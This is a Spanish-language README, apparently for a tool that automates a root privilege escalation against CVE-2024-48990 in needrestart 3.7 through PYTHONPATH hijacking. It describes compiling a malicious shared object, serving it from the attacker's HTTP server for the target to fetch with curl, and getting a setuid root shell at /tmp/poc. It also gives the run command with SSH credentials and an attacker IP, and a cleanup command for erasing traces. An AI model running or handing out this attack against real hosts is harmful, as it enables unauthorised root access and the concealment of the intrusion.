
Exploit automatizado de escalada de privilegios locales para CVE-2024-48990 (needrestart v3.7), que aprovecha el secuestro de PYTHONPATH para obtener acceso root.
Esta herramienta automatiza la explotación de una vulnerabilidad de escalada de privilegios en needrestart versión 3.7, identificada como CVE-2024-48990.
Logra la ejecución como root aprovechando el uso inseguro de la variable de entorno PYTHONPATH cuando needrestart escanea procesos de Python.
El exploit funciona mediante:
__init__.so) que se activa al importar..so a través de un servidor HTTP local.PYTHONPATH malicioso.importlib.needrestart, que hereda el PYTHONPATH manipulado, carga el módulo malicioso y ejecuta el payload como root./tmp/poc), permitiendo acceso a una shell root.Ejecute el exploit desde su máquina atacante:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
Parámetros:
needrestart versión 3.7Para eliminar rastros del exploit en el objetivo:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc (para compilar el payload)python3 -m http.server (iniciado automáticamente por el script)needrestart (v3.7)sudo NOPASSWD para /usr/sbin/needrestartcurl instaladosEsta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. No la utilice en sistemas que no le pertenezcan o sin permiso explícito.